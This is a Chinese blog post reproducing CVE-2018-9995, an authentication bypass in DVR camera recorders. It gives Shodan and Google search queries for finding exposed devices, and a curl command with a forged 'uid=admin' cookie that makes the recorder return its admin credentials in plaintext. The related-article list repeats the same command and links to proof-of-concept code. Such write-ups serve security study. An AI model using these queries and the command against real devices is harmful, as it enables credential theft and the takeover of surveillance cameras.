CVE-2018-9995摄像头

最新推荐文章于 2024-03-03 09:45:00 发布
VIP文章 最新推荐文章于 2024-03-03 09:45:00 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haha13l4/article/details/95951540
版权

一、漏洞介绍
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机。最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。

二、复现过程
1、搜索引擎搜索使用DVR设备的网站或服务器
Shodan/zoomeye: “GNU rsp/1.0” 或 “GNU rsp/1.0”
Google hacking : intitle:”DVR Logion”

2、搜索到结果后,进行测试。
条件:存在device.rsp页面并能访问。
在这里插入图片描述
3、在确认能够访问后进行漏洞利用
两种利用方法:
(1)使用curl
curl “http://<dvr_host>:/device.rsp?opt=user&cmd=list” -H “Cookie: uid=admin”
在这里插入图片描述
(2)直接使用原作者给出的脚本

最低0.47元/天 解锁文章
haha13l4
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
DVR登录绕过漏洞复现(CVE-2018-9995)
LKmnbZ's Blog
01-12 1208
1. 基本概念 POC proof ofConcept 观点证明 证明漏洞是存在的 一般对目标没有伤害的 EXP exploit 漏洞利用 具备了对目标造成伤害的能力 一般以获取远端的控制权为主要标志 VUL vulnerability 泛指漏洞 CVE Common Vulnerabilities & Exposures 公共漏洞和暴露 0DAY Zero-daye...
CVE-2018-9995--攻击网络硬盘录像机(DVR)
mouseleoz的博客
05-05 3544
漏洞编号:CVE-2018-9995发现时间:2018-4影响范围:tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL漏洞描述:   DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计...
海康摄像头CVE-2021-36260漏洞复现
最新发布
m0_61869253的博客
03-03 1193
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
DVR登录绕过漏洞(CVE-2018-9995)
weixin_30335575的博客
05-09 522
###漏洞描述 此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。 ###漏洞利用 1.利用代码 curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" 2.poc利用 https://github.com/ez...
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 2908
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
java虚拟机绕过,DVR登录绕过漏洞(CVE-2018-9995)
weixin_31302909的博客
03-16 415
###漏洞描述此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。###漏洞利用1.利用代码curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"2.poc利用https://github.com/ezelf/CVE-2018-9995_...
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
CVE-2018-18778.docx
07-23
CVE-2018-18778 ,mini_httpd任意文件读取漏洞,
CVE-2018-11759:显示如何利用CVE-2018-11759的概念证明
03-19
尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。环境设定docker-compose up -d请耐心等待,第一次的过程可能会很长...
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
cve-2018-9995 dvr登录绕过漏洞
weixin_34311757的博客
06-04 315
本帖最后由 Snow狼 于 2018-6-4 10:27 编辑 dvr登录绕过漏洞此漏洞允许×××者构造一个cookie即可登录漏洞语句:curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"测试有此漏洞的dvr:NovoCeNovoQSeePulnix ...
【漏洞复现】 CVE-2018-9995 DVR登陆绕过漏洞
weixin_34097242的博客
07-06 377
漏洞描述 类别:访问控制失效。访问DVR系列产品的WEB端时,设置如下cookie:uid=admin可绕过访问控制,获取设备内的用户名及登陆凭证。 漏洞利用 curl "http://ip:port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" EXP git clone https://github.com/exexute/E...
脏牛提权(cve-2016-5159)
热门推荐
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低权限的用户可利用这一漏洞在本地进行提权 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...
kali 安装所有工具
haha1314的博客
05-04 1万+
安装所有工具包 apt-get update apt-get install kali-linux-all
水平越权访问与垂直越权访问漏洞
haha1314的博客
05-20 7026
水平越权访问与垂直越权访问漏洞 越权访问漏洞 越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广、危害大,被OWASP列为Web应用十大安全隐患的第二名。 该漏洞是指应用在检查授权时存在纰漏,使得攻击者在获得低权限用户账户后,利用一些方式绕过权限检查,访问或者操作其他用户或者更高权限。越权漏洞的成因主要是因为开发人员在对数据进行增、...
openssl心脏滴血漏洞
haha1314的博客
07-15 4946
Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。 简单理解: OpenSSL:没有检测心跳包中的长度字段是否和后续的数据字段相符合...
制作一个ip多域名访问,或一个ip不同端口访问,或多个ip访问的网站。
haha1314的博客
05-06 4778
环境:windows server 2008 64位 一、在windows2008上安装IIS服务 下一步 安装完成关闭 二、搭建测试网站 127.0.0.1连接测试 域名测试 修改host文件 C:\Windows\System32\drivers\etc 结果 制作钓鱼网站 模仿的网站:http://www.bowenedu.cn/w/Default.htm 下载首页 网...
CVE-2018-8034
07-28
CVE-2018-8034是一个与Apache Tomcat相关的漏洞。根据提供的引用内容,我无法找到与CVE-2018-8034直接相关的信息。请提供更多关于CVE-2018-8034的信息,以便我能够为您提供准确的答案。 #### 引用[.reference_title]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值